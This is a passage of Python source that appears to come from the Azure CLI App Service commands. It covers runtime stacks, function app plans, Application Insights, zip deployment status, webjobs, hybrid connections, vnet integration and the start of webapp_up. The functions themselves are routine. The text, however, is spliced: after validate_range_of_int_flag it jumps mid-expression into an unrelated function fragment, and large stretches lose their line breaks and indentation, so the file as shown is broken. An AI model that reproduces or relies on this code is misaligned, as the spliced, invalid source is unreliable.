    def update_site_config(stack, site_config, cmd=None):
        # Apply a stack's settings as SiteConfig attributes (Windows stacks).
        for k, v in stack['configs'].items():
            setattr(site_config, k, v)
        return site_config

    @staticmethod
    def update_site_appsettings(cmd, stack, site_config):
        # Apply a stack's settings as app settings (used for node stacks).
        NameValuePair = cmd.get_models('NameValuePair')
        if site_config.app_settings is None:
            site_config.app_settings = []
        site_config.app_settings += [NameValuePair(name=k, value=v)
                                     for k, v in stack['configs'].items()]
        return site_config

    def _load_stacks(self):
        # Fetch and cache the available runtime stacks for the helper's OS.
        if self._stacks:
            return
        os_type = ('Linux' if self._linux else 'Windows')
        raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
        bytes_value = raw_stacks._get_next().content  # pylint: disable=protected-access
        json_value = bytes_value.decode('utf8')
        json_stacks = json.loads(json_value)
        stacks = json_stacks['value']
        result = []
        if self._linux:
            # Linux: display names come straight from the runtime versions,
            # preferring each major version's default minor.
            for properties in [(s['properties']) for s in stacks]:
                for major in properties['majorVersions']:
                    default_minor = next((m for m in (major['minorVersions'] or [])
                                          if m['isDefault']), None)
                    result.append({
                        'displayName': (default_minor['runtimeVersion']
                                        if default_minor else major['runtimeVersion'])
                    })
        else:  # Windows stacks
            # Map each stack to the SiteConfig field (or app setting) it drives.
            config_mappings = {
                'node': 'WEBSITE_NODE_DEFAULT_VERSION',
                'python': 'python_version',
                'php': 'php_version',
                'aspnet': 'net_framework_version'
            }
            # get all stack version except 'java'
            for stack in stacks:
                if stack['name'] not in config_mappings:
                    continue
                name, properties = stack['name'], stack['properties']
                for major in properties['majorVersions']:
                    default_minor = next((m for m in (major['minorVersions'] or [])
                                          if m['isDefault']), None)
                    result.append({
                        'displayName': name + '|' + major['displayVersion'],
                        'configs': {
                            config_mappings[name]: (default_minor['runtimeVersion']
                                                    if default_minor else major['runtimeVersion'])
                        }
                    })
            # deal with java, which pairs with java container version
            java_stack = next((s for s in stacks if s['name'] == 'java'))
            java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
            for java_version in java_stack['properties']['majorVersions']:
                for fx in java_container_stack['properties']['frameworks']:
                    for fx_version in fx['majorVersions']:
                        result.append({
                            'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
                                                                  fx['display'],
                                                                  fx_version['displayVersion']),
                            'configs': {
                                'java_version': java_version['runtimeVersion'],
                                'java_container': fx['name'],
                                'java_container_version': fx_version['runtimeVersion']
                            }
                        })
        # node stacks are configured through app settings; everything else via SiteConfig.
        for r in result:
            r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
                           r['displayName'] else _StackRuntimeHelper.update_site_config)
        self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
    # Resolve an Application Insights component's instrumentation key, raising
    # a CLI error when the component (or its key) is missing.
    appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
    appinsights = appinsights_client.components.get(resource_group, name)
    if appinsights is None or appinsights.instrumentation_key is None:
        raise CLIError("App Insights {} under resource group {} was not found.".format(
            name, resource_group))
    return appinsights.instrumentation_key


def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
                                        number_of_workers=None, max_burst=None,
                                        location=None, tags=None):
    # Create or update an App Service plan suitable for function apps.
    # --max-burst is only meaningful on Elastic Premium plans.
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    sku = _normalize_sku(sku)
    tier = get_sku_name(sku)
    if max_burst is not None:
        if tier.lower() != "elasticpremium":
            raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
        max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
    if number_of_workers is not None:
        number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
                                                       number_of_workers, min_val=0, max_val=20)
    client = web_client_factory(cmd.cli_ctx)
    if location is None:
        location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
    sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
    # reserved=True marks a Linux plan; None (not False) keeps Windows defaults.
    plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
                              reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
                              hyper_v=None, name=name)
    return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)


def is_plan_consumption(cmd, plan_info):
    # True when the plan is a (dynamic) Consumption plan.
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    if isinstance(plan_info, AppServicePlan):
        if isinstance(plan_info.sku, SkuDescription):
            return plan_info.sku.tier.lower() == 'dynamic'
    return False


def is_plan_elastic_premium(cmd, plan_info):
    # True when the plan is an Elastic Premium (EP) plan.
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    if isinstance(plan_info, AppServicePlan):
        if isinstance(plan_info.sku, SkuDescription):
            # CONSISTENCY FIX: compare case-insensitively like is_plan_consumption
            # does — the original `== 'ElasticPremium'` missed other valid casings.
            return plan_info.sku.tier.lower() == 'elasticpremium'
    return False
def validate_and_convert_to_int(flag, val):
    # Coerce a CLI flag value to int; a non-numeric value is a usage error.
    try:
        return int(val)
    except ValueError:
        raise CLIError("Usage error: {} is expected to have an int value.".format(flag))


def validate_range_of_int_flag(flag_name, value, min_val, max_val):
    # Coerce a CLI flag value to int and enforce the inclusive range
    # [min_val, max_val]; returns the validated integer.
    parsed = validate_and_convert_to_int(flag_name, value)
    if not min_val <= parsed <= max_val:
        raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
                                                                                                max_val))
    return parsed
value=_get_website_node_version_functionapp(functions_version, runtime, runtime_version))) # If plan is not consumption or elastic premium, we need to set always on if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info): site_config.always_on = True # If plan is elastic premium or windows consumption, we need these app settings is_windows_consumption = consumption_plan_location is not None and not is_linux if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption: site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING', value=con_string)) site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower())) create_app_insights = False if app_insights_key is not None: site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY', value=app_insights_key)) elif app_insights is not None: instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights) site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY', value=instrumentation_key)) elif not disable_app_insights: create_app_insights = True poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def) functionapp = LongRunningOperation(cmd.cli_ctx)(poller) if consumption_plan_location and is_linux: logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully" "created but is not active until content is published using" "Azure Portal or the Functions Core Tools.", name) else: _set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url, deployment_source_branch, deployment_local_git) if create_app_insights: try: try_create_application_insights(cmd, functionapp) except Exception: # pylint: disable=broad-except logger.warning('Error while trying to create and configure an Application Insights for the Function App. 
' 'Please use the Azure Portal to create and configure the Application Insights, if needed.') if deployment_container_image_name: update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url, deployment_container_image_name, docker_registry_server_user, docker_registry_server_password) return functionapp def _get_extension_version_functionapp(functions_version): if functions_version is not None: return '~{}'.format(functions_version) return '~2' def _get_linux_fx_functionapp(is_consumption, functions_version, runtime, runtime_version): if runtime_version is None: runtime_version = RUNTIME_TO_DEFAULT_VERSION_FUNCTIONAPP[functions_version][runtime] if is_consumption: return '{}|{}'.format(runtime.upper(), runtime_version) # App service or Elastic Premium return _format_fx_version(RUNTIME_TO_IMAGE_FUNCTIONAPP[functions_version][runtime][runtime_version]) def _get_website_node_version_functionapp(functions_version, runtime, runtime_version): if runtime is None or runtime != 'node': return NODE_VERSION_DEFAULT_FUNCTIONAPP[functions_version] if runtime_version is not None: return '~{}'.format(runtime_version) return NODE_VERSION_DEFAULT_FUNCTIONAPP[functions_version] def try_create_application_insights(cmd, functionapp): creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \ 'Please use the Azure Portal to manually create and configure the Application Insights, ' \ 'if needed.' 
ai_resource_group_name = functionapp.resource_group ai_name = functionapp.name ai_location = functionapp.location app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient) ai_properties = { "name": ai_name, "location": ai_location, "kind": "web", "properties": { "Application_Type": "web" } } appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties) if appinsights is None or appinsights.instrumentation_key is None: logger.warning(creation_failed_warn) return # We make this success message as a warning to no interfere with regular JSON output in stdout logger.warning('Application Insights \"%s\" was created for this Function App. ' 'You can visit https://portal.azure.com/#resource%s/overview to view your ' 'Application Insights component', appinsights.name, appinsights.id) update_app_settings(cmd, functionapp.resource_group, functionapp.name, ['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)]) def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None, deployment_source_branch='master', deployment_local_git=None): if deployment_source_url: logger.warning("Linking to git repository '%s'", deployment_source_url) try: config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git', deployment_source_branch, manual_integration=True) except Exception as ex: # pylint: disable=broad-except ex = ex_handler_factory(no_throw=True)(ex) logger.warning("Link to git repository failed due to error '%s'", ex) if deployment_local_git: local_git_info = enable_local_git(cmd, resource_group_name, name) logger.warning("Local git is configured with url of '%s'", local_git_info['url']) setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url']) def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account): sa_resource_group = resource_group_name if is_valid_resource_id(storage_account): 
sa_resource_group = parse_resource_id(storage_account)['resource_group'] storage_account = parse_resource_id(storage_account)['name'] storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient) storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group, storage_account) error_message = '' endpoints = storage_properties.primary_endpoints sku = storage_properties.sku.name allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS'] for e in ['blob', 'queue', 'table']: if not getattr(endpoints, e, None): error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long if sku not in allowed_storage_types: error_message += 'Storage type {} is not allowed'.format(sku) if error_message: raise CLIError(error_message) obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member try: keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member except AttributeError: # Older API versions have a slightly different structure keys = [obj.key1, obj.key2] # pylint: disable=no-member endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format( "https", endpoint_suffix, storage_account, keys[0]) # pylint: disable=no-member return connection_string def list_consumption_locations(cmd): client = web_client_factory(cmd.cli_ctx) regions = client.list_geo_regions(sku='Dynamic') return [{'name': x.name.lower().replace(' ', '')} for x in regions] def list_locations(cmd, sku, linux_workers_enabled=None): client = web_client_factory(cmd.cli_ctx) full_sku = get_sku_name(sku) return client.list_geo_regions(full_sku, linux_workers_enabled) def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, 
timeout=None): import requests from azure.cli.core.util import should_disable_connection_verify total_trials = (int(timeout) // 2) if timeout else 450 num_trials = 0 while num_trials < total_trials: time.sleep(2) response = requests.get(deployment_status_url, headers=authorization, verify=not should_disable_connection_verify()) time.sleep(2) try: res_dict = response.json() except json.decoder.JSONDecodeError: logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url) res_dict = {} finally: num_trials = num_trials + 1 if res_dict.get('status', 0) == 3: _configure_default_logging(cmd, rg_name, name) raise CLIError("""Zip deployment failed. {}. Please run the command az webapp log tail -n {} -g {}""".format(res_dict, name, rg_name)) if res_dict.get('status', 0) == 4: break if 'progress' in res_dict: logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing # if the deployment is taking longer than expected if res_dict.get('status', 0) != 4: _configure_default_logging(cmd, rg_name, name) raise CLIError("""Timeout reached by the command, however, the deployment operation is still on-going. 
Navigate to your scm site to check the deployment status""") return res_dict def list_continuous_webjobs(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot) def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot) return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot) client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name) return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name) def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot) return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot) client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name) return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name) def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot) return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name) def list_triggered_webjobs(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot) def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot) return 
            client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
    client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
    return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)


def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Delete a triggered webjob."""
    client = web_client_factory(cmd.cli_ctx)
    if slot:
        return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
    return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)


def list_hc(cmd, name, resource_group_name, slot=None):
    """List the app's hybrid connections, pruned down to the interesting fields."""
    linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
    is_linux = linux_webapp.reserved
    if is_linux:
        # returns None; the warning is the only output on Linux
        return logger.warning("hybrid connections not supported on a linux app.")

    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
    else:
        listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)

    # reformats hybrid connection, to prune unnecessary fields
    mod_list = []
    for x in listed_vals.additional_properties["value"]:
        properties = x["properties"]
        resourceGroup = x["id"].split("/")
        mod_hc = {
            "id": x["id"],
            "location": x["location"],
            "name": x["name"],
            "properties": {
                "hostname": properties["hostname"],
                "port": properties["port"],
                "relayArmUri": properties["relayArmUri"],
                "relayName": properties["relayName"],
                "serviceBusNamespace": properties["serviceBusNamespace"],
                "serviceBusSuffix": properties["serviceBusSuffix"]
            },
            # resource group is segment 4 of the ARM id
            "resourceGroup": resourceGroup[4],
            "type": x["type"]
        }
        mod_list.append(mod_hc)
    return mod_list


def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
    """Attach an existing Relay hybrid connection to a (Windows) webapp.

    Looks up the relay namespace, ensures a 'defaultSender' send-authorization
    rule exists, then binds the connection (hostname:port from relay metadata)
    to the app or slot. Returns a pruned dict describing the binding.
    """
    HybridConnection = cmd.get_models('HybridConnection')
    linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
    is_linux = linux_webapp.reserved
    if is_linux:
        return logger.warning("hybrid connections not supported on a linux app.")

    web_client = web_client_factory(cmd.cli_ctx)
    hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)

    # find the ARM id of the requested relay namespace
    hy_co_id = ''
    for n in namespace_client.list():
        if n.name == namespace:
            hy_co_id = n.id

    # extract the namespace's resource group from its ARM id
    i = 0
    hy_co_resource_group = ''
    hy_co_split = hy_co_id.split("/")
    for z in hy_co_split:
        if z == "resourceGroups":
            hy_co_resource_group = hy_co_split[i + 1]
        i = i + 1

    # calling the relay API to get information about the hybrid connection
    hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)

    # if the hybrid connection does not have a default sender authorization rule, create it
    hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
    has_default_sender_key = False
    for r in hy_co_rules:
        if r.name.lower() == "defaultsender":
            for z in r.rights:
                if z == z.send:
                    has_default_sender_key = True

    if not has_default_sender_key:
        rights = [AccessRights.send]
        hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
                                                         "defaultSender", rights)

    hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
    hy_co_info = hy_co.id
    # relay user_metadata is a stringified list of {"key": ..., "value": ...} dicts
    hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = ''
    for x in hy_co_metadata:
        if x["key"] == "endpoint":
            hy_co_hostname = x["value"]

    hostname_parts = hy_co_hostname.split(":")
    hostname = hostname_parts[0]
    port = hostname_parts[1]
    id_parameters = hy_co_info.split("/")

    # populate object with information from the hybrid connection, and set it on webapp
    hc = HybridConnection(service_bus_namespace=id_parameters[8],
                          relay_name=hybrid_connection,
                          relay_arm_uri=hy_co_info,
                          hostname=hostname,
                          port=port,
                          send_key_name="defaultSender",
                          send_key_value=hy_co_keys.primary_key,
                          service_bus_suffix=".servicebus.windows.net")
    if slot is None:
        return_hc = \
            web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
                                                                   hybrid_connection, hc)
    else:
        return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name,
                                                                                namespace, hybrid_connection,
                                                                                hc, slot)

    # reformats hybrid connection, to prune unnecessary fields
    resourceGroup = return_hc.id.split("/")
    mod_hc = {
        "hostname": return_hc.hostname,
        "id": return_hc.id,
        "location": return_hc.additional_properties["location"],
        "name": return_hc.name,
        "port": return_hc.port,
        "relayArmUri": return_hc.relay_arm_uri,
        "resourceGroup": resourceGroup[4],
        "serviceBusNamespace": return_hc.service_bus_namespace,
        "serviceBusSuffix": return_hc.service_bus_suffix
    }
    return mod_hc


# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
    """Rotate the relay key ('primary'/'secondary') on every app using the hybrid connection."""
    HybridConnection = cmd.get_models('HybridConnection')
    web_client = web_client_factory(cmd.cli_ctx)

    # extract the hybrid connection resource group
    asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
                                                                   namespace, hybrid_connection)
    arm_uri = asp_hy_co.relay_arm_uri
    split_uri = arm_uri.split("resourceGroups/")
    resource_group_strings = split_uri[1].split('/')
    relay_resource_group = resource_group_strings[0]

    hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    # calling the relay function to obtain information about the hc in question
    hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)

    # if the hybrid connection does not have a default sender authorization rule, create it
    hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
    has_default_sender_key = False
    for r in hy_co_rules:
        if r.name.lower() == "defaultsender":
            for z in r.rights:
                if z == z.send:
                    has_default_sender_key = True

    if not has_default_sender_key:
        rights = [AccessRights.send]
        hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
                                                         "defaultSender", rights)

    hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
    hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    # NOTE(review): initialised to 0 here ('' in add_hc); .split(":") below would
    # fail if no "endpoint" entry exists — confirm metadata always carries one.
    hy_co_hostname = 0
    for x in hy_co_metadata:
        if x["key"] == "endpoint":
            hy_co_hostname = x["value"]

    hostname_parts = hy_co_hostname.split(":")
    hostname = hostname_parts[0]
    port = hostname_parts[1]

    key = "empty"
    if key_type.lower() == "primary":
        key = hy_co_keys.primary_key
    elif key_type.lower() == "secondary":
        key = hy_co_keys.secondary_key
    # ensures input is correct
    if key == "empty":
        logger.warning("Key type is invalid - must be primary or secondary")
        return

    apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
                                                                           namespace, hybrid_connection)
    # changes the key for every app that uses that hybrid connection
    for x in apps:
        app_info = ast.literal_eval(x)
        app_name = app_info["name"]
        app_id = app_info["id"]
        id_split = app_id.split("/")
        app_resource_group = id_split[4]
        hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
                              relay_arm_uri=arm_uri, hostname=hostname, port=port,
                              send_key_name="defaultSender", send_key_value=key)
        web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
                                                     hybrid_connection, hc)

    return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
                                                                           namespace, hybrid_connection)


def appservice_list_vnet(cmd, resource_group_name, plan):
    """List the virtual networks attached to an App Service plan."""
    web_client = web_client_factory(cmd.cli_ctx)
    return web_client.app_service_plans.list_vnets(resource_group_name, plan)


def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
    """Detach a hybrid connection from a (Windows) webapp or slot."""
    linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
    is_linux = linux_webapp.reserved
    if is_linux:
        return logger.warning("hybrid connections not supported on a linux app.")
    client = \
        web_client_factory(cmd.cli_ctx)
    if slot is None:
        return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace,
                                                             hybrid_connection)
    else:
        return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
                                                                  hybrid_connection, slot)
    return return_hc


def list_vnet_integration(cmd, name, resource_group_name, slot=None):
    """List the app's vnet integrations, reformatted to the interesting fields only."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
    else:
        result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
    mod_list = []

    # reformats the vnet entry, removing unecessary information
    for x in result:
        # removes GUIDs from name and id
        longName = x.name
        if '_' in longName:
            usIndex = longName.index('_')
            shortName = longName[usIndex + 1:]
        else:
            shortName = longName
        v_id = x.id
        lastSlash = v_id.rindex('/')
        shortId = v_id[:lastSlash] + '/' + shortName
        # extracts desired fields
        certThumbprint = x.cert_thumbprint
        location = x.additional_properties["location"]
        v_type = x.type
        vnet_resource_id = x.vnet_resource_id
        id_strings = v_id.split('/')
        resourceGroup = id_strings[4]
        routes = x.routes

        vnet_mod = {"certThumbprint": certThumbprint,
                    "id": shortId,
                    "location": location,
                    "name": shortName,
                    "resourceGroup": resourceGroup,
                    "routes": routes,
                    "type": v_type,
                    "vnetResourceId": vnet_resource_id}
        mod_list.append(vnet_mod)

    return mod_list


def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None):
    """Integrate a webapp (or slot) with a subnet via Swift vnet integration.

    Ensures the subnet is delegated to Microsoft.Web/serverFarms before creating
    the connection. Returns a pruned dict describing the resulting integration.
    """
    SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
    Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
    client = web_client_factory(cmd.cli_ctx)
    vnet_client = network_client_factory(cmd.cli_ctx)

    list_all_vnets = vnet_client.virtual_networks.list_all()

    # resolve the vnet name (subscription-wide) to its ARM id
    vnet_id = ''
    for v in list_all_vnets:
        if v.name == vnet:
            vnet_id = v.id

    # parsing the arm uri in order to extract vnet_name and vnet_resource_group
    vnet_id_strings = vnet_id.split('/')

    vnet_resource_group = ''
    i = 0
    for z in vnet_id_strings:
        if z.lower() == "resourcegroups":
            vnet_resource_group = vnet_id_strings[i + 1]
        i = i + 1

    if slot is None:
        swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
    else:
        swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
                                                                                          name, slot)

    # check to see if the connection would be supported
    if swift_connection_info.swift_supported is not True:
        return logger.warning("""Your app must be in an Azure App Service deployment that is capable of scaling up to Premium v2\nLearn more: https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")

    subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
    delegations = subnetObj.delegations
    delegated = False
    for d in delegations:
        if d.service_name.lower() == "microsoft.web/serverfarms".lower():
            delegated = True

    if not delegated:
        # delegate the subnet to App Service before connecting
        subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
        vnet_client.subnets.create_or_update(vnet_resource_group, vnet, subnet,
                                             subnet_parameters=subnetObj)

    id_subnet = vnet_client.subnets.get(vnet_resource_group, vnet, subnet)
    subnet_resource_id = id_subnet.id
    swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
                                    swift_supported=True)
    if slot is None:
        return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection(resource_group_name,
                                                                                        name, swiftVnet)
    else:
        return_vnet = client.web_apps.create_or_update_swift_virtual_network_connection_slot(resource_group_name,
                                                                                             name, swiftVnet,
                                                                                             slot)

    # reformats the vnet entry, removing unecessary information
    id_strings = return_vnet.id.split('/')
    resourceGroup = id_strings[4]
    mod_vnet = {
        "id": return_vnet.id,
        "location": return_vnet.additional_properties["location"],
        "name": return_vnet.name,
        "resourceGroup": resourceGroup,
        "subnetResourceId": return_vnet.subnet_resource_id
    }

    return mod_vnet


def remove_vnet_integration(cmd, name,
resource_group_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot is None: return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name) else: return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot) return return_vnet def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot) return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name) def webapp_up(cmd, name, resource_group_name=None, plan=None, location=None, sku=None, dryrun=False, logs=False, # pylint: disable=too-many-statements, launch_browser=False, html=False): import os AppServicePlan = cmd.get_models('AppServicePlan') src_dir = os.getcwd() _src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep)) client = web_client_factory(cmd.cli_ctx) user = get_profile_username() _create_new_rg = False _create_new_app = does_app_already_exist(cmd, name) os_name = detect_os_form_src(src_dir, html) lang_details = get_lang_from_content(src_dir, html) language = lang_details.get('language') # detect the version data = get_runtime_version_details(lang_details.get('file_loc'), language) version_used_create = data.get('to_create') detected_version = data.get('detected') runtime_version = "{}|{}".format(language, version_used_create) if \ version_used_create != "-" else version_used_create site_config = None if not _create_new_app: # App exists # Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those logger.warning("Webapp %s already exists. The command will deploy contents to the existing app.", name) app_details = get_app_details(cmd, name) if app_details is None: raise CLIError("Unable to retrieve details of the existing app {}. 
Please check that the app is a part of " "the current subscription".format(name)) current_rg = app_details.resource_group if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()): raise CLIError("The webapp {} exists in ResourceGroup {} and does not match the value entered {}. Please " "re-run command with the correct parameters.". format(name, current_rg, resource_group_name)) rg_name = resource_group_name or current_rg if location is None: loc = app_details.location.replace(" ", "").lower() else: loc = location.replace(" ", "").lower() plan_details = parse_resource_id(app_details.server_farm_id) current_plan = plan_details['name'] if plan is not None and current_plan.lower() != plan.lower(): raise CLIError("The plan name entered {} does not match the plan name that the webapp is hosted in {}." "Please check if you have configured defaults for plan name and re-run command." .format(plan, current_plan)) plan = plan or plan_details['name'] plan_info = client.app_service_plans.get(rg_name, plan) sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free' current_os = 'Linux' if plan_info.reserved else 'Windows' # Raise error if current OS of the app is different from the current one if current_os.lower() != os_name.lower(): raise CLIError("The webapp {} is a {} app. The code detected at '{}' will default to " "'{}'. 
